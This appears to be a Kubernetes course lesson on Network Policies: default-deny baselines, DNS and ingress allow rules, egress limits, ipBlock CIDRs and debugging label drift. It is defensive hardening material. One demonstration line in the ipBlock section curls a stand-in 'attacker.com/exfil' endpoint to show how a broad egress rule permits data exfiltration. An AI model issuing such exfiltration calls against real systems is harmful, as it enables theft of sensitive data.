Kubernetes Course
Network Policies
By default, every Pod in your cluster can send traffic to every other Pod — no restrictions, no firewall rules, complete open access. That's fine for a development laptop. For a production cluster handling payment data and user credentials, it's a serious risk. Network Policies are Kubernetes's built-in firewall — and this lesson shows you how to use them to enforce least-privilege networking.
Why the Default is Dangerous
Imagine a microservices cluster with 40 services. Without Network Policies, if an attacker compromises the frontend service, they can immediately make direct TCP connections to your PostgreSQL database, your Redis cache, your internal admin API, and every other service — no additional credentials needed if those services trust internal traffic. This is lateral movement — moving from a compromised entry point deeper into the system.
Network Policies let you say exactly which Pods can talk to which other Pods, on which ports, in which direction. If your frontend only needs to call the order API on port 8080, you can write a policy that allows exactly that — and blocks the frontend from reaching the database, the payment processor, and everything else it has no business touching.
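That frontend-to-order-API rule could look like the following sketch (the policy name, labels, and namespace here are illustrative assumptions, not from a real cluster):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: frontend-egress        # Hypothetical name for illustration
  namespace: production        # Assumed namespace
spec:
  podSelector:
    matchLabels:
      app: frontend            # Applies to frontend Pods only
  policyTypes:
  - Egress
  egress:
  - to:
    - podSelector:
        matchLabels:
          app: order-api       # Only the order API...
    ports:
    - protocol: TCP
      port: 8080               # ...and only on port 8080
```

Note that the moment this policy selects the frontend Pods, all other egress from them (including DNS) is denied unless another policy allows it, a point this lesson returns to below.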
⚠️ Network Policies require a CNI plugin that enforces them
Network Policies are just Kubernetes objects — they do nothing without a CNI plugin that reads and enforces them. Flannel does not enforce Network Policies. Calico, Cilium, Weave Net, and most other production CNI plugins do. If you apply a Network Policy on a Flannel cluster, the policy is silently ignored. Check which CNI your cluster uses before relying on Network Policies for security.
How Network Policy Selection Works
A Network Policy has three key components. The podSelector identifies which Pods the policy applies to — these are the Pods whose ingress/egress traffic will be controlled. The policyTypes field declares whether the policy affects incoming traffic (Ingress), outgoing traffic (Egress), or both. The ingress/egress rules specify what is allowed — from which sources, to which destinations, on which ports.
Two critical rules govern how policies combine:
Rule 1 — Default deny when a policy exists. The moment any Network Policy selects a Pod, traffic that is not explicitly allowed by any policy is denied. You don't need a separate "deny all" policy — the absence of an allow rule IS the deny.
Rule 2 — Multiple policies are ORed together. If two Network Policies both select the same Pod, a connection is allowed if it is permitted by either policy. The policies don't AND together — any matching allow rule wins.
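As an illustrative sketch of Rule 2 (the names and namespaces are assumptions), two policies that select the same Pod combine into the union of their allow rules:

```yaml
# Policy A: allow ingress from namespace x
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-from-x
  namespace: demo
spec:
  podSelector:
    matchLabels:
      app: target
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: x
---
# Policy B: allow ingress from namespace y.
# With both applied, Pods in x OR y can reach app=target,
# because a connection is allowed if ANY selecting policy permits it.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-from-y
  namespace: demo
spec:
  podSelector:
    matchLabels:
      app: target
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: y
```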
The Default Deny Baseline
The recommended production pattern is to start with a default-deny policy for every namespace, then add explicit allow rules for the traffic that needs to flow. This is the allowlist model — deny everything by default, explicitly permit what's needed.
The scenario: You're hardening the payments namespace. It processes card data and has PCI DSS compliance requirements. The first step is to block all traffic that isn't explicitly permitted.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all     # Descriptive name — clearly communicates intent
  namespace: payments        # Apply to the payments namespace only
spec:
  podSelector: {}            # {} = empty selector = applies to ALL Pods in the namespace
  policyTypes:
  - Ingress                  # Block all incoming traffic to any Pod
  - Egress                   # Block all outgoing traffic from any Pod
# No ingress or egress rules defined = deny everything
# This is the "closed" baseline — nothing flows until explicitly allowed
$ kubectl apply -f default-deny-all.yaml
networkpolicy.networking.k8s.io/default-deny-all created

$ kubectl get networkpolicy -n payments
NAME               POD-SELECTOR   AGE
default-deny-all   <none>         4s

$ kubectl run test-pod --image=nicolaka/netshoot --rm -it --restart=Never -n payments
bash-5.1# curl -v http://payment-api-svc:80/health --max-time 3
curl: (28) Connection timed out after 3001 milliseconds
bash-5.1# nslookup payment-api-svc
;; connection timed out; no servers could be reached
(even DNS is blocked — DNS queries over UDP 53 to CoreDNS are now denied)
What just happened?
POD-SELECTOR: <none> — The empty selector ({}) means "select all Pods in this namespace," so every Pod in the payments namespace is now subject to this policy. kubectl displays an empty selector as <none>.
DNS is blocked too — The egress deny is total. Even DNS queries (UDP port 53 to the CoreDNS ClusterIP) are blocked. This is why applying a default-deny policy without immediately adding DNS allow rules will break every application in the namespace. Always pair a default-deny policy with the DNS allow rule that comes next.
Connection timeout vs connection refused — Network Policy violations typically manifest as connection timeouts (the packet is dropped, not rejected). This is different from "connection refused" which means the port is reachable but nothing is listening. A timeout during debugging often means a Network Policy is blocking the traffic.
Allowing DNS and Specific Ingress Traffic
After the default deny, you need to selectively allow what should work. The first rule to add is always DNS — without it, nothing resolves. Then add your application-specific allow rules one by one.
The scenario: You've applied the default deny. Now you need: (1) DNS to work for all Pods, (2) the payment API to accept requests from the checkout service in the production namespace, and (3) the Prometheus monitoring stack to scrape metrics from the payment API. Nothing else should be allowed in.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress            # Every namespace with a default-deny needs this
  namespace: payments
spec:
  podSelector: {}                   # Apply to all Pods
  policyTypes:
  - Egress
  egress:
  - ports:
    - protocol: UDP
      port: 53                      # DNS over UDP
    - protocol: TCP
      port: 53                      # DNS over TCP (for large responses)
    # No 'to' selector = allow to any destination
    # This allows DNS to CoreDNS regardless of its IP
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-payment-api-ingress
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-api              # This policy applies only to payment-api Pods
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:            # Only from the 'production' namespace
        matchLabels:
          kubernetes.io/metadata.name: production
      podSelector:                  # AND only from Pods labelled app=checkout-api
        matchLabels:
          app: checkout-api
    # Note: namespaceSelector + podSelector in the same list item = AND
    # namespaceSelector and podSelector as separate list items = OR
    - namespaceSelector:            # Also allow from the 'monitoring' namespace
        matchLabels:
          kubernetes.io/metadata.name: monitoring
      podSelector:
        matchLabels:
          app: prometheus           # Only from Prometheus Pods in monitoring namespace
    ports:
    - protocol: TCP
      port: 8080                    # Only allow traffic on the API port
    - protocol: TCP
      port: 9090                    # Prometheus metrics scrape port
$ kubectl apply -f allow-dns-and-payment-ingress.yaml
networkpolicy.networking.k8s.io/allow-dns-egress created
networkpolicy.networking.k8s.io/allow-payment-api-ingress created
$ kubectl get networkpolicy -n payments
NAME POD-SELECTOR AGE
default-deny-all <none> 2m
allow-dns-egress <none> 5s
allow-payment-api-ingress app=payment-api 5s
(from a checkout-api Pod in the production namespace:)
$ curl http://payment-api-svc.payments.svc.cluster.local:8080/health
{"status":"healthy"} ← checkout-api can now reach payment-api
(from a frontend Pod in the production namespace:)
$ curl http://payment-api-svc.payments.svc.cluster.local:8080/health --max-time 3
curl: (28) Connection timed out ← frontend cannot reach payment-api (not in allow list)
What just happened?
AND vs OR in the from selector — This is the most confusing part of Network Policy syntax. When namespaceSelector and podSelector appear in the same list item (under the same -), they are ANDed — "must be in THIS namespace AND have THIS label." When they appear as separate list items (each with their own -), they are ORed — "from this namespace OR from Pods with this label." Getting this wrong is the most common Network Policy mistake.
kubernetes.io/metadata.name — Namespaces have a built-in label kubernetes.io/metadata.name automatically set to the namespace's name (added in Kubernetes 1.21). Using it in namespaceSelector is the correct way to reference a specific namespace by name in Network Policies.
Ports specified at the rule level, not the selector level — The ports list applies to the entire ingress rule. Both the checkout-api source and the Prometheus source share the same port allowance (8080 and 9090). If you need different ports for different sources, put them in separate ingress rule blocks.
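The contrast is easiest to see side by side. This fragment (illustrative labels, meant to sit under a policy's spec) shows both forms, and also shows separate rule blocks carrying different ports:

```yaml
ingress:
# AND: one list item. The source must be in 'production'
# AND carry the label app=checkout-api.
- from:
  - namespaceSelector:
      matchLabels:
        kubernetes.io/metadata.name: production
    podSelector:
      matchLabels:
        app: checkout-api
  ports:
  - protocol: TCP
    port: 8080
# OR: two list items. Any Pod in 'production', OR any Pod labelled
# app=checkout-api in the policy's OWN namespace (a much broader grant).
- from:
  - namespaceSelector:
      matchLabels:
        kubernetes.io/metadata.name: production
  - podSelector:
      matchLabels:
        app: checkout-api
  ports:
  - protocol: TCP
    port: 9090                  # A different port for this separate rule block
```

One caveat worth remembering: a standalone podSelector in a from list matches Pods in the policy's own namespace only, never in other namespaces.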
Egress Policies: Controlling Outbound Traffic
Egress policies control what Pods can connect to. They're essential for preventing data exfiltration — a compromised Pod shouldn't be able to make outbound connections to attacker-controlled servers. They're also important for multi-tier applications where only specific services should be able to reach the database.
The scenario: The payment API should only be allowed to connect to: the PostgreSQL database on port 5432, the fraud detection service on port 8080, and external DNS. Everything else — the internet, other internal services — should be blocked. This prevents a compromised payment API from exfiltrating card data to an external server.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-api-egress
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-api              # Apply this egress policy to payment-api Pods only
  policyTypes:
  - Egress
  egress:
  - to:
    - podSelector:                  # Allow to postgres Pods in the same namespace
        matchLabels:
          app: postgres
    ports:
    - protocol: TCP
      port: 5432                    # PostgreSQL port only
  - to:
    - namespaceSelector:            # Allow to fraud-detection service in its namespace
        matchLabels:
          kubernetes.io/metadata.name: fraud-detection
      podSelector:
        matchLabels:
          app: fraud-svc
    ports:
    - protocol: TCP
      port: 8080
  - ports:                          # Allow DNS (no 'to' selector = any destination)
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53
# Nothing else is allowed outbound from payment-api
# The internet, AWS APIs, other cluster services — all blocked
$ kubectl apply -f payment-api-egress.yaml
networkpolicy.networking.k8s.io/payment-api-egress created

(from inside a payment-api Pod:)
$ nc -zv postgres.payments.svc.cluster.local 5432
Connection to postgres.payments.svc.cluster.local 5432 port [tcp/postgresql] succeeded!
$ nc -zv fraud-svc.fraud-detection.svc.cluster.local 8080
Connection to fraud-svc.fraud-detection.svc.cluster.local 8080 port [tcp] succeeded!
$ curl --max-time 3 https://api.stripe.com/v1/charges
curl: (28) Connection timed out   ← outbound internet blocked ✓
$ nc -zv -w3 order-svc.production.svc.cluster.local 8080
nc: connect to order-svc.production.svc.cluster.local port 8080 (tcp) timed out   ← blocked ✓
What just happened?
Data exfiltration blocked — The payment API can reach its database and the fraud service, but not the internet or any other cluster service. If an attacker gains code execution in the payment API pod, they can't make outbound calls to their C2 server or to any other internal service to pivot laterally. The blast radius of a compromise is dramatically contained.
The DNS rule has no destination restriction — The DNS egress rule has a ports section but no to section, which allows DNS queries to any destination on port 53. Technically you could restrict it to the CoreDNS ClusterIP using an ipBlock rule, but that IP differs across clusters. The port-only approach is the pragmatic production choice.
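If you do want to pin DNS egress to CoreDNS without hardcoding an IP, one common alternative is to select the CoreDNS Pods by label. This is a sketch that assumes the standard k8s-app=kube-dns label most distributions put on CoreDNS Pods; verify the label on your cluster first:

```yaml
egress:
- to:
  - namespaceSelector:
      matchLabels:
        kubernetes.io/metadata.name: kube-system
    podSelector:
      matchLabels:
        k8s-app: kube-dns     # Conventional label on CoreDNS Pods (assumption: your distro uses it)
  ports:
  - protocol: UDP
    port: 53
  - protocol: TCP
    port: 53
```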
Egress policies interact with ingress policies — For a connection from payment-api to postgres to succeed, both the egress policy on payment-api (allowing outbound to postgres:5432) AND the ingress policy on postgres (allowing inbound from payment-api) must permit the traffic. A connection is only allowed if both sides have matching allow rules.
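The postgres side of that pair could look like this sketch (the labels follow the earlier examples in this lesson; check them against your actual Deployments):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: postgres-ingress      # Hypothetical name for illustration
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: postgres           # Applies to the database Pods
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:            # Same-namespace source: only payment-api Pods
        matchLabels:
          app: payment-api
    ports:
    - protocol: TCP
      port: 5432              # Mirrors the egress rule on payment-api
```

With both policies in place, the connection succeeds because each side explicitly allows its half of the flow.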
Network Policy Architecture for a Production Namespace
Here's the complete Network Policy architecture for the payments namespace — all policies working together to implement least-privilege networking:
payments namespace — Network Policy map
Active policies in payments: default-deny-all, allow-dns-egress, allow-payment-api-ingress, payment-api-egress.
Allowed: checkout-api (production ns) → payment-api (matched by allow-payment-api-ingress).
Allowed: prometheus (monitoring ns) → payment-api (monitoring ns + prometheus label in ingress rule).
Allowed: payment-api → postgres and fraud-svc (matched by payment-api-egress).
Blocked: frontend → payment-api (frontend not in the allow list for payment-api ingress).
Blocked: payment-api → external destinations (no egress rule permits external destinations).
Blocked: payment-api → order-svc (order-svc not in payment-api's egress allowlist).
IPBlock: Controlling External Traffic
So far all examples have used label selectors to identify traffic sources and destinations. For traffic from outside the cluster — specific IP ranges, on-premises CIDRs, or external APIs — you use ipBlock.
The scenario: The payment API needs to make outbound calls to an external payment gateway at 198.51.100.0/24 on port 443. All other external internet traffic should remain blocked.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-api-external-egress
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-api
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 198.51.100.0/24       # Allow to this specific external IP range
        except:
        - 198.51.100.10/32          # Except this specific IP within the range
        - 198.51.100.11/32          # And this one — perhaps deprecated gateway endpoints
    ports:
    - protocol: TCP
      port: 443                     # HTTPS only
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0             # All IPs
        except:
        - 10.0.0.0/8                # Except private ranges — prevents reaching internal services
        - 172.16.0.0/12             #   via external CIDR rules
        - 192.168.0.0/16
    ports:
    - protocol: TCP
      port: 443                     # Allow all other HTTPS — useful for cloud provider APIs
$ kubectl apply -f payment-api-external-egress.yaml
networkpolicy.networking.k8s.io/payment-api-external-egress created

(from inside a payment-api Pod:)
$ curl --max-time 3 https://198.51.100.1/api/charge
HTTP/2 200                        ← payment gateway reachable ✓
$ curl --max-time 3 http://198.51.100.1/api/charge
curl: (28) Connection timed out   ← port 80 blocked, only 443 allowed ✓
$ curl --max-time 3 https://api.attacker.com/exfil
HTTP/2 200                        ← WAIT — if 0.0.0.0/0 except RFC1918 is allowed, external HTTPS reaches everything
What just happened?
ipBlock for external traffic — Unlike pod/namespace selectors which apply within the cluster, ipBlock lets you specify external IP ranges. The except list carves out sub-ranges from the allowed CIDR. This is how you allow the specific payment gateway IPs while blocking everything else in that subnet.
The broad 0.0.0.0/0 except RFC1918 risk — The second egress rule in the example above is a common but dangerous pattern. Allowing all external HTTPS except private ranges sounds safe — but it allows the Pod to reach any public server on port 443. A compromised Pod can exfiltrate data to any HTTPS endpoint on the internet. Prefer explicit CIDR allowlists over broad "except private ranges" rules for sensitive workloads.
Debugging Network Policies
The scenario: Service A stopped being able to reach Service B after a network policy was applied. You need to diagnose which policy is blocking the traffic.
kubectl get networkpolicy -n payments
# List all network policies in the namespace — see what's active
kubectl describe networkpolicy allow-payment-api-ingress -n payments
# Full policy detail: podSelector, policyTypes, full ingress/egress rules
# Compare the from/to selectors against the labels on your Pods
kubectl get pod payment-api-7d9c4b-xr7nq -n payments --show-labels
# Check the actual labels on the target Pod
# Labels must EXACTLY match the podSelector in the NetworkPolicy
kubectl get namespace production --show-labels
# Check namespace labels — namespaceSelector requires the namespace to have matching labels
# New namespaces may not have the kubernetes.io/metadata.name label on older clusters
kubectl run netpol-debug --image=nicolaka/netshoot --rm -it --restart=Never \
-n production --labels="app=checkout-api"
# Launch a debug Pod with the exact same labels as the allowed source
# Test connectivity from a Pod that SHOULD be allowed
# Then test from a Pod without those labels — confirm that its traffic is blocked
kubectl exec -it netpol-debug -n production -- nc -zv -w3 \
payment-api-svc.payments.svc.cluster.local 8080
# nc -zv: test TCP connectivity without sending data
# -w3: timeout after 3 seconds
# Timeout = blocked by NetworkPolicy or no Pod listening
# "Connection refused" = reached the Pod but port isn't open
$ kubectl get pod payment-api-7d9c4b-xr7nq -n payments --show-labels
NAME READY STATUS LABELS
payment-api-7d9c4b-xr7nq 1/1 Running app=payment-api,version=3.1.0
$ kubectl describe networkpolicy allow-payment-api-ingress -n payments
...
Spec:
PodSelector: app=payment-api
Ingress:
From:
NamespaceSelector: kubernetes.io/metadata.name=production
PodSelector: app=checkout-api
...
$ kubectl get namespace production --show-labels
NAME STATUS LABELS
production Active kubernetes.io/metadata.name=production ← label present ✓
(problem found: the checkout-api Pod was recently redeployed with a new label app=checkout instead of app=checkout-api)
$ kubectl get pod -n production -l app=checkout-api
No resources found ← selector matches nothing!
$ kubectl get pod -n production -l app=checkout
NAME LABELS
checkout-api-9c4b2f-2xkpj   app=checkout,version=2.4.0   ← label drift!
What just happened?
Label drift breaks Network Policies silently — The checkout deployment was updated and someone changed the label from app=checkout-api to app=checkout. The Network Policy's ingress rule still references the old label, so the checkout Pods no longer match the from podSelector and their traffic is blocked as if they were unknown sources. The fix is either to update the Network Policy to match the new label or to revert the label change.
The most common Network Policy debug workflow — (1) List policies in both namespaces. (2) Check Pod labels match the selectors. (3) Check namespace labels match the namespaceSelector. (4) Run a test Pod with matching labels and test from it. (5) Run a test Pod without the labels and confirm it's blocked. The --labels flag on kubectl run is the key to simulating the right identity for these tests.
Teacher's Note: Start permissive, tighten incrementally
The mistake I see teams make most often with Network Policies is applying a default-deny to production the same day they write the first policy, then spending the next week firefighting as one service after another breaks. The correct approach is incremental: start without a default-deny, add explicit allow policies first, validate that all necessary traffic is covered, then add the default-deny last once you're confident the allow rules are complete.
One more thing: Network Policies are namespace-scoped, but the effect of a policy can cross namespaces via namespaceSelector. A policy in the payments namespace can allow traffic from the production namespace. This cross-namespace visibility is intentional and powerful — but it means label hygiene on both namespaces and Pods is critical for security. A mislabelled namespace could inadvertently grant access.
For Cilium users: Cilium extends the standard Network Policy with CiliumNetworkPolicy which supports L7 rules — allow traffic from checkout-api to payment-api only on the POST /charges endpoint, reject all other paths. This is Layer 7 microsegmentation and it's significantly more powerful than port-level Network Policies for HTTP traffic.
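A sketch of such an L7 rule, using illustrative labels and assuming Cilium is installed (CiliumNetworkPolicy is a Cilium CRD, not part of standard Kubernetes, so this manifest is rejected on other CNIs):

```yaml
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: payment-api-l7        # Hypothetical name for illustration
  namespace: payments
spec:
  endpointSelector:
    matchLabels:
      app: payment-api
  ingress:
  - fromEndpoints:
    - matchLabels:
        app: checkout-api
        k8s:io.kubernetes.pod.namespace: production   # Cilium's namespace label
    toPorts:
    - ports:
      - port: "8080"
        protocol: TCP
      rules:
        http:
        - method: "POST"      # Only POST /charges is allowed through
          path: "/charges"    # Other paths and methods are rejected at L7
```

Unlike a standard Network Policy drop (a silent timeout), an L7 deny is enforced by Cilium's proxy, so the client receives an HTTP error response rather than a hung connection.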
Practice Questions
1. A Network Policy is blocking traffic between two Pods. When the blocked Pod tries to connect, does it see a "connection refused" error or a "connection timeout"? Why?
2. Two Network Policies both select the same Pod. Policy A allows ingress from namespace X. Policy B allows ingress from namespace Y. Can Pods from both namespaces X and Y reach the target Pod?
3. A Network Policy needs to allow egress traffic to an external payment gateway at the IP range 198.51.100.0/24. Since this is not a Kubernetes Pod, you cannot use podSelector or namespaceSelector. Which field do you use instead?
Quiz
1. In a Network Policy's from list, what is the difference between having namespaceSelector and podSelector under the same - vs as two separate - entries?
2. You apply a Network Policy to a cluster using Flannel as the CNI. What happens?
3. What is the correct way to create a default-deny-all Network Policy that blocks all ingress AND egress for every Pod in a namespace?
Up Next · Lesson 37
RBAC Introduction
Network Policies control what services can talk to each other. RBAC controls what humans and automated systems can do with the Kubernetes API — and getting it wrong is how clusters get compromised through the control plane.